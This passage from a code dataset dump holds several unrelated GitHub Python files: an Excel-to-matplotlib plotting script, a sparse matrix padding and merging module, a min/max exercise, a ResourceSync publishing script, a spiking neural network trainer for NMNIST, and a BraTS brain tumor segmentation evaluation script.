1\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\ndef get_data(xlspath, shtindx=0):\n xls = xlrd.open_workbook(xlspath)\n sheet = xls.sheets()[shtindx]\n m = sheet.nrows # 行数\n l = sheet.ncols # 列数\n sheetname = sheet.cell_value(0, 0)\n col_names = sheet.row_values(1)\n print(col_names)\n datasss = {}\n for i in range(len(col_names)):\n # 将字段和对应值组成字典\n datasss[col_names[i]] = sheet.col_values(i)[2:]\n datasss['sheet_name'] = sheetname\n datasss['n_rows'] = m\n datasss['n_cols'] = l\n datasss['col_names'] = sheet.row_values(1)\n for key in datasss:\n if debug:\n print(key, '=', datasss[key])\n return datasss\n\n\ndef draw(data_dic):\n global x\n # d = get_data(xls, index)\n col_names = data_dic['col_names']\n\n figname = data_dic['sheet_name']\n fig = figure(figsize=(16, 8), dpi=80)\n\n ax = fig.add_subplot(1, 1, 1)\n # x = [i for i in range(xlen)]\n point = ['b.-', 'r.-', 'g.-', 'k.-', 'c.-', 'm.-', 'y.-', 'b^-']\n\n xname = col_names[0]\n x = [int(i) for i in data_dic[xname]]\n xlen = len(x)\n for i in range(1, len(col_names)):\n # 排除作为横轴标签的数据列,从第二列开始画图\n y = [n for n in data_dic[col_names[i]]]\n # point[i] = point[i][:2]\n ax.plot(x, y, point[i], label=col_names[i], linewidth=0.1)\n ax.set_xlabel(xname)\n # ax.set_xticks([0, int(0.2*xlen), int(0.4*xlen), int(0.6*xlen), int(0.8*xlen), xlen])\n ax.set_xticks([int(i/10*xlen) for i in range(0, 12, 2)])\n # ax.set_xticklabels([x[0]] + [x[int(i/10*xlen)] for i in range(2, 10, 2)] + [x[-1]+1])\n # ax.set_xticklabels([x[0], x[int(0.2*xlen)], x[int(0.4*xlen)], x[int(0.6*xlen)], x[int(0.8*xlen)], x[xlen-1]])\n ax.set_ylabel('当前重量值')\n ax.set_title(figname)\n ax.legend() # 图例\n ax.grid() # 网格\n\n\nif __name__ == '__main__':\n # xls_path = r\"E:\\流程17\\WE_测试流程-余发荣-2017-09-08 称重模块功能修改测试\\测��\\ModbusPoll 数据采集\\2wt 零点 默认.xlsx\"\n # col_name = u'当前平均重量'\n # xls_path = r\"E:\\Redmine-任务\\四路型BD模块(有壳)测试239\\测试\\水壶加热测温实验数据8路1.xls\"\n # xls_path = r\"E:\\Redmine\\20180503 李为 两路型BD板模块(有壳)LX3V-2PTS-BD_V1.2\\PID验证实验\\绘图.xls\"\n xls_path = r\"P:\\FAN_SHARED\\201805 v-box版本测试遗留问题处理\\测试结果\\不同方式上电启动耗时_新方式\\不同方式上电启动耗时整理.xlsx\"\n # sheet_index = 0\n # col_str = r'跟踪间隔0不启用 跟踪间隔1 跟踪间隔1000 跟踪间隔10000 跟踪间隔20000'\n # col_str = r'跟踪范围0 跟踪范围5 跟踪范围20 跟踪范围50 跟踪范围100'\n # col_str = r'稳定检查时间0(1) 稳定检查时间1 稳定检查时间200 稳定检查时间500 稳定检查时间1000'\n # col_str = r'检查范围0/1 检查范围5 检查范围20 检查范围50 检查范围100'\n # col_str = r'2PT2DAV-1\t2PT2DAV-2\t2PT2ADV-1\t2PT2ADV-2\t4PT-1\t4PT-2\t4PT-3\t4PT-4'\n d = get_data(xls_path)\n draw(d)\n show()\n","repo_name":"wwkkww1983/pythonwork","sub_path":"matplotlib/read_xls_to_draw.py","file_name":"read_xls_to_draw.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40568195999","text":"import numpy as np\nfrom mosek_test import *\nfrom utils import *\n\n\n\ndef flatten(xss):\n return [x for xs in xss for x in xs]\n\n\ndef sop_mining(A, row_panel_size):\n n = A.shape[0]\n cnt = 0\n T = np.zeros((n, A.shape[1], 4))\n for i in range(n):\n for j in range(A.shape[1]):\n T[i, j, 0] = i\n T[i, j, 1] = j\n T[i, j, 2] = A[i, j]\n if A[i, j] != 0:\n T[i, j, 3] = cnt\n cnt = cnt + 1\n groups, groups_2d, group_nz, groups_cols, groups_val = [], [], [], [], []\n num_panels = int(n/row_panel_size)\n for i in range(0, num_panels):\n groups_2d.append([])\n mat = A[i*row_panel_size:(i+1)*row_panel_size, :]\n for j in range(A.shape[1]):\n if np.sum(np.ravel(mat[:, j])) != 0:\n tmp = take_nonzeros(T[i*row_panel_size:(i+1)*row_panel_size,j, 2], T[i*row_panel_size:(i+1)*row_panel_size,j, 0])\n tmp_col = take_nonzeros(T[i*row_panel_size:(i+1)*row_panel_size,j, 2], T[i*row_panel_size:(i+1)*row_panel_size,j, 1])\n tmp_nz = take_nonzeros(T[i*row_panel_size:(i+1)*row_panel_size,j, 2], T[i*row_panel_size:(i+1)*row_panel_size,j, 3])\n groups.append(tmp)\n groups_cols.append(tmp_col)\n groups_2d[i].append(tmp)\n group_nz.append(tmp_nz)\n\n return groups, groups_2d, group_nz, (np.array(flatten(groups_cols)),\n np.array(flatten(groups)))\n\n\ndef padding_blas_cost(pnt_grp1, pnt_grp2, op_to_idx):\n blas_grp = []\n min_x, min_y = 1e20, 1e20\n max_x, max_y = 0, 0\n merged_grp = list(set(pnt_grp1 + pnt_grp2))\n for pnt in merged_grp:\n x_coo = op_to_idx[0][pnt]\n y_coo = op_to_idx[1][pnt]\n min_x = np.min((x_coo, min_x))\n min_y = np.min((y_coo, min_y))\n max_x = np.max((x_coo, max_x))\n max_y = np.max((y_coo, max_y))\n cost_grp = (max_x-min_x+1) * (max_y-min_y+1) - len(merged_grp)\n return blas_grp, cost_grp\n\n\ndef padding_sop_cost(pnt_grp1, pnt_grp2, op_to_idx):\n blas_grp = []\n l1 = len(pnt_grp1)\n l2 = len(pnt_grp2)\n merged_grp_l = len(list(set(pnt_grp1 + pnt_grp2)))\n cost_grp = merged_grp_l / (l1+l2)\n return blas_grp, cost_grp\n\n\ndef pair_group_cost(grp1, grp2):\n blas_grp = []\n l1 = grp1.get_num_op()\n l2 = len(grp2)\n merged_grp_l = len(list(set(grp1 + grp2)))\n cost_grp = merged_grp_l / (l1+l2)\n return blas_grp, cost_grp\n\n\ndef BLAS_padding(codelet_groups, operation_to_coordinate, psc_enabled):\n grp_no = len(codelet_groups)\n grp_mat = np.zeros((grp_no, grp_no))\n for i in range(grp_no):\n for j in range(i, grp_no):\n if psc_enabled:\n [gr, cst] = padding_blas_cost(codelet_groups[i], codelet_groups[j],\n operation_to_coordinate)\n else:\n [gr, cst] = padding_sop_cost(codelet_groups[i], codelet_groups[j],\n operation_to_coordinate)\n grp_mat[i, j] = cst\n grp_mat[j, i] = cst\n return grp_mat\n\n\ndef create_merged_group(merg_schedule, groups):\n new_grp = []\n for m in merg_schedule:\n merged_set = []\n for i in m:\n merged_set = list(set(merged_set + groups[i]))\n new_grp.append(merged_set)\n return new_grp\n\n\ndef merging(num_iter, init_grps, init_grps_idx, op_to_coo, psc_enabled, method):\n groups = init_grps if psc_enabled else init_grps_idx\n for i in range(num_iter):\n costs = BLAS_padding(groups, op_to_coo, psc_enabled)\n if method == METHOD.ILP:\n mrgs_sol, dim = padding_ilp_problem(costs)\n else:\n mrgs_sol, dim = padding_sorting_problem(costs)\n mrgs_schedule = list_to_groups(dim, mrgs_sol)\n groups = create_merged_group(mrgs_schedule, groups)\n groups = create_merged_group(mrgs_schedule, init_grps)\n return groups\n\n\ndef merging_sop(num_parts, init_grps, init_grps_idx, op_to_coo, method):\n groups = init_grps_idx\n groups_nnz = init_grps\n cur_groups = len(groups)\n while cur_groups > num_parts:\n costs = BLAS_padding(groups, op_to_coo, False)\n if method == METHOD.ILP:\n mrgs_sol, dim = padding_ilp_problem(costs)\n else:\n mrgs_sol, dim = padding_sorting_problem(costs)\n mrgs_schedule = list_to_groups(dim, mrgs_sol)\n groups = create_merged_group(mrgs_schedule, groups)\n groups_nnz = create_merged_group(mrgs_schedule, groups_nnz)\n cur_groups = len(groups)\n return groups_nnz\n\n\n\n\n\n\n\n\n","repo_name":"SpRegTiling/sparse-register-tiling","sub_path":"sbench/ilp_pad/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"23076115856","text":"import sys\r\n\r\ncounts = int(sys.stdin.readline())\r\nnumbers = list(map(int, sys.stdin.readline().rstrip().split()))\r\n# max_result=0\r\n# min_result=0\r\n# for i in range(len(numbers)):\r\n# if i == 0:\r\n# max_result = numbers[i]\r\n# else:\r\n# if i > max_result:\r\n# max_result = i\r\n# for j in range(len(numbers)):\r\n# if j == 0:\r\n# min_result = numbers[j]\r\n# else:\r\n# if numbers[j] < min_result:\r\n# min_result = numbers[j]\r\n\r\n\r\nmin_result = min(numbers)\r\nmax_result = max(numbers)\r\nprint(min_result, max_result)\r\n","repo_name":"violetassom/Baekjoon","sub_path":"백준/Bronze/10818. 최소, 최대/최소, 최대.py","file_name":"최소, 최대.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40804531191","text":"#! /usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport sys\n# Enable dynamic imports\nsys.path.append(\".\")\n\nfrom argparse import ArgumentParser\nfrom syncdirector import SyncDirector\n\n# Publish rdf patch files as resource dumps.\n\n# Bundle up to max_files_compressed rdf patch files as successive definitely published resources;\n# bundle the remainder of rdf patch files as temporary bundled resources.\n\nparser = ArgumentParser()\n# parser arguments:\n# --source_dir: directory containing files to be synced\n# --sink_dir: directory where files will be published\n# --publish_url: public url pointing to sink dir\n# --builder_class: class to handle the publishing of resources\n# --max_files_compressed: the maximum number of resource files that should be compressed in one file\n# --write_separate_manifest: 'y' to write manifest included in published dump also in sink_dir as a separate file\n# --move_resources: 'y' to move definitely published resources from source_dir to sink_dir,\n# otherwise simply remove them from resource_dir.\nparser.add_argument('--source_dir', required=True)\nparser.add_argument('--sink_dir', required=True)\nparser.add_argument('--publish_url', required=True)\nparser.add_argument('--builder_class', default=\"zipsynchronizer.ZipSynchronizer\")\nparser.add_argument('--max_files_compressed', type=int, default=50000)\nparser.add_argument('--write_separate_manifest', default=\"y\")\nparser.add_argument('--move_resources', default=\"n\")\nargs = parser.parse_args()\n\nwrite_separate_manifest = args.write_separate_manifest == \"y\"\nmove_resources = args.move_resources == \"y\"\n\ndirector = SyncDirector(args.source_dir, args.sink_dir, args.publish_url, args.builder_class,\n args.max_files_compressed, write_separate_manifest, move_resources)\ndirector.synchronize()","repo_name":"CLARIAH/virtuoso-quad-log","sub_path":"resourcesync-generator/oai-rs/rsync.py","file_name":"rsync.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36642748938","text":"import torch\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\nimport torch.nn.init\nimport os\nimport torch.nn as nn\nimport time\nimport matplotlib.pyplot as plt\nimport tonic.transforms as transforms\nimport tonic\nimport numpy as np\nimport snntorch as snn\nfrom snntorch import surrogate\nfrom snntorch import functional as SF\nfrom snntorch import spikeplot as splt\nfrom snntorch import utils\nimport torch.nn as nn\nimport os\nfrom torch.utils.data import DataLoader, random_split\nimport torch\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nsensor_size = tonic.datasets.NMNIST.sensor_size\n\n# Denoise removes isolated, one-off events\n# time_window\nframe_transform = transforms.ToFrame(sensor_size=sensor_size, time_window=1)\n\n\nframe_transform = transforms.Compose([transforms.Denoise(filter_time=10000),\n transforms.ToFrame(sensor_size=sensor_size,\n time_window=10000)\n ])\n\ntrainset = tonic.datasets.NMNIST(save_to='/home/hubo1024/PycharmProjects/snntorch/data/NMNIST', transform=frame_transform, train=True)\ntestset = tonic.datasets.NMNIST(save_to='./home/hubo1024/PycharmProjects/snntorch/data/NMNIST', transform=frame_transform, train=False)\n\n# 랜덤 시드 고정\ntorch.manual_seed(777)\n\n# GPU 사용 가능일 경우 랜덤 시드 고정\nif device == 'cuda':\n torch.cuda.manual_seed_all(777)\n\n#batch_size = 100\n\nbatch_size = 32\ndataset_size = len(trainset)\ntrain_size = int(dataset_size * 0.9)\nvalidation_size = int(dataset_size * 0.1)\n\n\ntrainset, valset = random_split(trainset, [train_size, validation_size])\nprint(len(valset))\nprint(len(trainset))\ntrainloader = DataLoader(trainset, batch_size=batch_size, collate_fn=tonic.collation.PadTensors(), shuffle=True)\nvalloader = DataLoader(valset, batch_size=batch_size, collate_fn=tonic.collation.PadTensors(), shuffle=True)\ntestloader = DataLoader(testset, batch_size=batch_size, collate_fn=tonic.collation.PadTensors())\n\n\nspike_grad = surrogate.fast_sigmoid(slope=75)\nbeta = 0.5\n\nclass CNN(torch.nn.Module):\n\n def __init__(self):\n super(CNN, self).__init__()\n self.keep_prob = 0.5\n self.layer1 = torch.nn.Sequential(\n nn.Conv2d(2, 12, 5),\n nn.MaxPool2d(2),\n snn.Leaky(beta=beta, spike_grad=spike_grad, init_hidden=True))\n\n self.layer2 = torch.nn.Sequential(\n nn.Conv2d(12, 32, 5),\n nn.MaxPool2d(2),\n snn.Leaky(beta=beta, spike_grad=spike_grad, init_hidden=True))\n\n # L4 FC 4x4x128 inputs -> 625 outputs\n\n self.layer4 = torch.nn.Sequential(\n nn.Flatten(),\n nn.Linear(32 * 5 * 5, 10),\n snn.Leaky(beta=beta, spike_grad=spike_grad, init_hidden=True, output=True))\n # L5 Final FC 625 inputs -> 10 outputs\n\n def forward(self, data):\n spk_rec = []\n layer1_rec = []\n layer2_rec = []\n utils.reset(self.layer1) # resets hidden states for all LIF neurons in net\n utils.reset(self.layer2)\n utils.reset(self.layer4)\n\n for step in range(data.size(1)): # data.size(0) = number of time steps\n input_torch = data[:, step, :, :, :]\n input_torch = input_torch.cuda()\n #print(input_torch)\n out = self.layer1(input_torch)\n out1 = out\n\n out = self.layer2(out)\n out2 = out\n out, mem = self.layer4(out)\n\n spk_rec.append(out)\n\n layer1_rec.append(out1)\n layer2_rec.append(out2)\n\n return torch.stack(spk_rec), torch.stack(layer1_rec), torch.stack(layer2_rec)\n# CNN 모델 정의\n\n#os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = '1, 2, 3'\nmodel = CNN().to(device)\noptimizer = torch.optim.NAdam(model.parameters(), lr=0.005,betas=(0.9, 0.999))\nloss_fn = SF.mse_count_loss(correct_rate=0.8, incorrect_rate=0.2)\n#model = nn.DataParallel(model)\n\ntotal_batch = len(trainloader)\nprint('총 배치의 수 : {}'.format(total_batch))\nloss_fn = SF.mse_count_loss(correct_rate=0.8, incorrect_rate=0.2)\nnum_epochs = 15\nloss_hist = []\nacc_hist = []\nv_acc_hist = []\nt_spk_rec_sum = []\nstart = time.time()\nval_cnt = 0\nv_acc_sum= 0\navg_loss = 0\nindex = 0\n#################################################\n\n\n\nfor epoch in range(num_epochs):\n torch.save(model.state_dict(), '/home/hubo1024/PycharmProjects/snntorch/model_pt/Nadam_05loss-10000.pt')\n for i, (data, targets) in enumerate(iter(trainloader)):\n data = data.cuda()\n targets = targets.cuda()\n\n model.train()\n spk_rec, h1, h2 = model( data)\n #print(spk_rec.shape)\n loss_val = loss_fn(spk_rec, targets)\n avg_loss += loss_val.item()\n # Gradient calculation + weight update\n optimizer.zero_grad()\n\n loss_val.backward()\n optimizer.step()\n #print(spk_rec.shape)\n # Store loss history for future plotting\n loss_hist.append(loss_val.item())\n val_cnt = val_cnt+1\n\n if val_cnt == len(trainloader)/2-1:\n val_cnt=0\n torch.save(model.state_dict(), '/home/hubo1024/PycharmProjects/snntorch/model_pt/Nadam_05loss-10000.pt')\n for ii, (v_data, v_targets) in enumerate(iter(valloader)):\n v_data = v_data.to(device)\n v_targets = v_targets.to(device)\n\n v_spk_rec, h1, h2 = model(v_data)\n # print(t_spk_rec.shape)\n v_acc = SF.accuracy_rate(v_spk_rec, v_targets)\n if ii == 0:\n v_acc_sum = v_acc\n cnt = 1\n\n else:\n v_acc_sum += v_acc\n cnt += 1\n plt.plot(acc_hist)\n plt.plot(v_acc_hist)\n plt.legend(['train accuracy', 'validation accuracy'])\n plt.title(\"Train, Validation Accuracy-Nadam_05loss-10000\")\n plt.xlabel(\"Iteration\")\n plt.ylabel(\"Accuracy\")\n # plt.show()\n plt.savefig('Nadam_05loss-10000.png')\n plt.clf()\n v_acc_sum = v_acc_sum/cnt\n\n avg_loss = avg_loss / (len(trainloader) / 2)\n print('average loss while half epoch:', avg_loss)\n if avg_loss <= 0.5:\n index = 1\n break\n else:\n avg_loss = 0\n index = 0\n\n print('Nadam_05loss-10000')\n print(\"time :\", time.time() - start,\"sec\")\n print(f\"Epoch {epoch}, Iteration {i} \\nTrain Loss: {loss_val.item():.2f}\")\n\n acc = SF.accuracy_rate(spk_rec, targets)\n acc_hist.append(acc)\n v_acc_hist.append(v_acc_sum)\n print(f\"Train Accuracy: {acc * 100:.2f}%\")\n print(f\"Validation Accuracy: {v_acc_sum * 100:.2f}%\\n\")\n if index == 1:\n torch.save(model.state_dict(), '/home/hubo1024/PycharmProjects/snntorch/model_pt/Nadam_05loss-10000.pt')\n break\n if index == 1:\n break\n","repo_name":"Hyunho-Won/SNN_paper","sub_path":"train/manual_train.py","file_name":"manual_train.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"71838178484","text":"import os\r\nimport argparse\r\n\r\nimport numpy as np\r\nimport torch\r\nimport torch.optim as optim\r\nfrom torchvision.transforms import transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom tqdm import tqdm\r\n\r\n\"\"\"\r\n=============================自己的包===========================\r\n\"\"\"\r\nfrom BraTS2021 import *\r\nfrom BraTS2018 import *\r\nfrom BraTS2019 import *\r\nfrom utils import *\r\n\r\nfrom networks.MyNet.MyNet import MyNet\r\nfrom networks.MyNet.baseline import Baseline\r\nfrom networks.MyNet.baselineMRF import BaselineMRF\r\nfrom networks.MyNet.baselineRSA import BaselineRSA\r\nfrom networks.DingYi.Ding_Yi import Yi_Ding\r\nfrom networks.Liuliangliang.Liuliangliang import Liangliang_Liu\r\nfrom networks.LuoZhengrong.LuoZhengrong import Zhengrong_Luo\r\nfrom networks.PeirisHimashi.unet import Unet\r\nfrom networks.PeirisHimashi.layers import get_norm_layer\r\nfrom networks.Henry.unet import Att_EquiUnet\r\nfrom networks.ChenChen.DMFNet import DMFNet\r\nfrom networks.Islam.attention_unet import UNet3D\r\n\r\nfrom draw_box import draw_box_bar\r\n\r\n\r\ndef val_loop(model, criterion, loader, device):\r\n model.eval()\r\n running_loss = 0\r\n dice1_val = 0\r\n dice2_val = 0\r\n dice3_val = 0\r\n sen_WT, sen_ET, sen_TC = 0, 0, 0\r\n spe_WT, spe_ET, spe_TC = 0, 0, 0\r\n ds_wt, ds_et, ds_tc = 0, 0, 0\r\n\r\n pbar = tqdm(loader, desc='Validation: ')\r\n with torch.no_grad():\r\n step = 0\r\n for images, masks in pbar:\r\n step += 1\r\n images, masks = images.to(device), masks.to(device)\r\n outputs = model(images)\r\n # outputs = torch.softmax(outputs,dim=1)\r\n\r\n loss = criterion(outputs, masks)\r\n dice1, dice2, dice3 = cal_dice(outputs, masks)\r\n\r\n running_loss += loss.item()\r\n dice1_val += dice1.item()\r\n dice2_val += dice2.item()\r\n dice3_val += dice3.item()\r\n\r\n # with open(f\"{MODEL_NAME}_et.txt\", 'a+') as f:\r\n # f.write(\"{:.3f}, \".format(dice1.item()))\r\n # if step % 20 == 0:\r\n # f.write('\\n')\r\n # with open(f\"{MODEL_NAME}_wt.txt\", 'a+') as f:\r\n # f.write(\"{:.3f}, \".format(dice3.item()))\r\n # if step % 20 == 0:\r\n # f.write('\\n')\r\n # with open(f\"{MODEL_NAME}_tc.txt\", 'a+') as f:\r\n # f.write(\"{:.3f}, \".format(dice2.item()))\r\n # if step % 20 == 0:\r\n # f.write('\\n')\r\n\r\n pbar.set_postfix(loss=f\"{loss:.3f}\", dice1=f'{dice1:.3f}', dice2=f\"{dice2:.3f}\", dice3=f\"{dice3:.3f}\")\r\n\r\n # oh_label = F.one_hot(masks, 4).permute(0, 4, 1, 2, 3).to(device)\r\n # oh_output = torch.sigmoid(outputs).to(device)\r\n oh_label = F.one_hot(masks, 4).permute(0, 4, 1, 2, 3).detach().cpu().numpy()\r\n oh_output = torch.argmax(outputs, dim=1).long()\r\n oh_output = F.one_hot(oh_output, 4).permute(0, 4, 1, 2, 3).detach().cpu().numpy()\r\n oh_output_h = torch.sigmoid(outputs).detach().cpu()\r\n\r\n sen_WT += sensitivity_WT(oh_output, oh_label)\r\n sen_ET += sensitivity_ET(oh_output, oh_label)\r\n sen_TC += sensitivity_TC(oh_output, oh_label)\r\n spe_WT += specificity_WT(oh_output, oh_label)\r\n spe_ET += specificity_ET(oh_output, oh_label)\r\n spe_TC += specificity_TC(oh_output, oh_label)\r\n # ds_wt += hausdorff_distance_WT(torch.from_numpy(oh_output), torch.from_numpy(oh_label))\r\n # ds_et += hausdorff_distance_ET(torch.from_numpy(oh_output), torch.from_numpy(oh_label))\r\n # ds_tc += hausdorff_distance_TC(torch.from_numpy(oh_output), torch.from_numpy(oh_label))\r\n ds_wt += hausdorff_distance_WT(oh_output_h, torch.from_numpy(oh_label))\r\n ds_et += hausdorff_distance_ET(oh_output_h, torch.from_numpy(oh_label))\r\n ds_tc += hausdorff_distance_TC(oh_output_h, torch.from_numpy(oh_label))\r\n\r\n sen_WT = sen_WT / len(loader)\r\n sen_ET = sen_ET / len(loader)\r\n sen_TC = sen_TC / len(loader)\r\n spe_WT = spe_WT / len(loader)\r\n spe_ET = spe_ET / len(loader)\r\n spe_TC = spe_TC / len(loader)\r\n ds_wt = ds_wt / len(loader)\r\n ds_et = ds_et / len(loader)\r\n ds_tc = ds_tc / len(loader)\r\n\r\n loss = running_loss / len(loader)\r\n dice1 = dice1_val / len(loader)\r\n dice2 = dice2_val / len(loader)\r\n dice3 = dice3_val / len(loader)\r\n return {'loss': loss, 'dice1': dice1, 'dice2': dice2, 'dice3': dice3,\r\n 'sen_WT': sen_WT, 'sen_ET': sen_ET, 'sen_TC': sen_TC,\r\n 'spe_WT': spe_WT, 'spe_ET': spe_ET, 'spe_TC': spe_TC,\r\n 'ds_wt': ds_wt, 'ds_et': ds_et, 'ds_tc': ds_tc}\r\n\r\n\r\ndef main(args):\r\n np.random.seed(args.seed)\r\n torch.manual_seed(args.seed) # 为CPU设置种子用于生成随机数,以使得结果是确定的\r\n torch.cuda.manual_seed_all(args.seed) # 为所有的GPU设置种子,以使得结果是确定的\r\n\r\n torch.backends.cudnn.deterministic = True\r\n torch.backends.cudnn.benchmark = True\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n # data info\r\n patch_size = (128, 128, 64)\r\n # train_dataset = BraTS2021(args.data_path, args.train_txt, transform=transforms.Compose([\r\n # RandomRotFlip(),\r\n # CenterCrop(patch_size),\r\n # GaussianNoise(p=0.1),\r\n # ToTensor()\r\n # ]))\r\n val_dataset = BraTS2021(args.data_path, args.valid_txt, transform=transforms.Compose([\r\n CenterCrop(patch_size),\r\n ToTensor()\r\n ]))\r\n # test_dataset = BraTS2021(args.data_path, args.test_txt, transform=transforms.Compose([\r\n # CenterCrop(patch_size),\r\n # ToTensor()\r\n # ]))\r\n data_path = \"../dataset/brats2019/data\"\r\n patch_size = (128, 128, 64)\r\n test_dataset = BraTS2019(data_path, transform=transforms.Compose([\r\n RandomRotFlip(),\r\n CenterCrop(patch_size),\r\n GaussianNoise(p=0.1),\r\n ToTensor()\r\n ]))\r\n # train_loader = DataLoader(dataset=train_dataset, batch_size=args.batch_size, num_workers=8, # num_worker=4\r\n # shuffle=True, pin_memory=True)\r\n val_loader = DataLoader(dataset=val_dataset, batch_size=args.batch_size, num_workers=8, shuffle=False,\r\n pin_memory=True)\r\n test_loader = DataLoader(dataset=test_dataset, batch_size=args.batch_size, num_workers=8, shuffle=False,\r\n pin_memory=True)\r\n\r\n\r\n\r\n print(\"using {} device.\".format(device))\r\n print(\"using {} images for validation, {} images for testing.\".format(len(val_dataset), len(test_dataset)))\r\n # img,label = train_dataset[0]\r\n\r\n # 1-坏疽(NT,necrotic tumor core),2-浮肿区域(ED,peritumoral edema),4-增强肿瘤区域(ET,enhancing tumor)\r\n # 评价指标:ET(label4),TC(label1+label4),WT(label1+label2+label4)\r\n print(f\"using {MODEL_NAME} for training\")\r\n if MODEL_NAME == 'MyNet':\r\n model = MyNet(in_channels=4, num_classes=4).to(device)\r\n elif MODEL_NAME == 'Yi_Ding':\r\n model = Yi_Ding(in_data=4, out_data=4).to(device)\r\n elif MODEL_NAME == 'Zhengrong_Luo':\r\n model = Zhengrong_Luo(in_data=4, out_data=4).to(device)\r\n elif MODEL_NAME == 'LiuLiangLiang':\r\n model = Liangliang_Liu(in_data=4, out_data=4).to(device)\r\n elif MODEL_NAME == 'PeirisHimashi':\r\n model = Unet(4, 4, width=32, norm_layer=get_norm_layer('inorm'), dropout=0).to(device)\r\n elif MODEL_NAME == 'TheophrasteHenry':\r\n model = Att_EquiUnet(4, 4, width=32, norm_layer=get_norm_layer('inorm'), dropout=0).to(device)\r\n elif MODEL_NAME == 'ChenChen':\r\n model = DMFNet(c=4, groups=16, norm='sync_bn', num_classes=4).to(device)\r\n elif MODEL_NAME == 'lslam':\r\n model = UNet3D(in_channels=4, out_channels=4, final_sigmoid=False).to(device)\r\n elif MODEL_NAME == 'baseline':\r\n model = Baseline(in_channels=4, num_classes=4).to(device)\r\n elif MODEL_NAME == 'baselineMRF':\r\n model = BaselineMRF(in_channels=4, num_classes=4).to(device)\r\n elif MODEL_NAME == 'baselineRSA':\r\n model = BaselineRSA(in_channels=4, num_classes=4).to(device)\r\n\r\n criterion = Loss(n_classes=4, weight=torch.tensor([0.25, 0.25, 0.25, 0.25])).to(device)\r\n\r\n # 加载训练模型\r\n if os.path.exists(args.weights):\r\n weight_dict = torch.load(args.weights, map_location=device)\r\n model.load_state_dict(weight_dict['model'])\r\n print('Successfully loading checkpoint.')\r\n\r\n # metrics2 = val_loop(model, criterion, val_loader, device)\r\n metrics3 = val_loop(model, criterion, test_loader, device)\r\n\r\n # print(\"Valid -- loss: {:.5f} ET: {:.5f} TC: {:.5f} WT: {:.5f}\".format(metrics2['loss'], metrics2['dice1'],\r\n # metrics2['dice2'], metrics2['dice3']))\r\n # print(\"Valid -- sen_WT: {:.5f} sen_ET: {:.5f} sen_TC: {:.5f}\".format(metrics2['sen_WT'], metrics2['sen_ET'],\r\n # metrics2['sen_TC']))\r\n # print(\"Valid -- spe_WT: {:.5f} spe_ET: {:.5f} spe_TC: {:.5f}\".format(metrics2['spe_WT'], metrics2['spe_ET'],\r\n # metrics2['spe_TC']))\r\n # print(\"Valid -- ds_wt: {:.3f} ds_et: {:.3f} ds_tc: {:.3f}\".format(metrics2['ds_wt'], metrics2['ds_et'],\r\n # metrics2['ds_tc']))\r\n\r\n\r\n print(\"Test -- loss: {:.5f} ET: {:.5f} TC: {:.5f} WT: {:.5f}\".format(metrics3['loss'], metrics3['dice1'],\r\n metrics3['dice2'], metrics3['dice3']))\r\n print(\"Test -- sen_WT: {:.5f} sen_ET: {:.5f} sen_TC: {:.5f}\".format(metrics3['sen_WT'], metrics3['sen_ET'],\r\n metrics3['sen_TC']))\r\n print(\"Test -- spe_WT: {:.5f} spe_ET: {:.5f} spe_TC: {:.5f}\".format(metrics3['spe_WT'], metrics3['spe_ET'],\r\n metrics3['spe_TC']))\r\n print(\"Test -- ds_wt: {:.3f} ds_et: {:.3f} ds_tc: {:.3f}\".format(metrics3['ds_wt'], metrics3['ds_et'],\r\n metrics3['ds_tc']))\r\n\r\n\r\nif __name__ == '__main__':\r\n MODEL_NAME = 'MyNet'\r\n # MODEL_NAME = 'PeirisHimashi'\r\n # MODEL_NAME = 'Yi_Ding'\r\n # MODEL_NAME = 'Zhengrong_Luo'\r\n # MODEL_NAME = 'LiuLiangLiang'\r\n # MODEL_NAME = 'TheophrasteHenry'\r\n # MODEL_NAME = 'ChenChen'\r\n # MODEL_NAME = 'lslam'\r\n # MODEL_NAME = 'baseline'\r\n # MODEL_NAME = 'baselineMRF'\r\n # MODEL_NAME = 'baselineRSA'\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--num_classes', type=int, default=4)\r\n parser.add_argument('--seed', type=int, default=21)\r\n parser.add_argument('--epochs', type=int, default=10)\r\n parser.add_argument('--warmup_epochs', type=int, default=5)\r\n parser.add_argument('--batch_size', type=int, default=1)\r\n parser.add_argument('--lr', type=float, default=1e-3)\r\n parser.add_argument('--min_lr', type=float, default=0.002)\r\n parser.add_argument('--data_path', type=str, default='../dataset/brats2021/data')\r\n # parser.add_argument('--val_data_path', type=str, default='../dataset/brats2020/val_data/data')\r\n parser.add_argument('--train_txt', type=str, default='../dataset/brats2021/train.txt')\r\n parser.add_argument('--valid_txt', type=str, default='../dataset/brats2021/valid.txt')\r\n parser.add_argument('--test_txt', type=str, default='../dataset/brats2021/test.txt')\r\n parser.add_argument('--train_log', type=str, default=f'results/{MODEL_NAME}/{MODEL_NAME}.txt')\r\n parser.add_argument('--weights', type=str, default=f'results/{MODEL_NAME}/{MODEL_NAME}.pth')\r\n parser.add_argument('--save_path', type=str, default=f'checkpoint/{MODEL_NAME}')\r\n args = parser.parse_args()\r\n\r\n 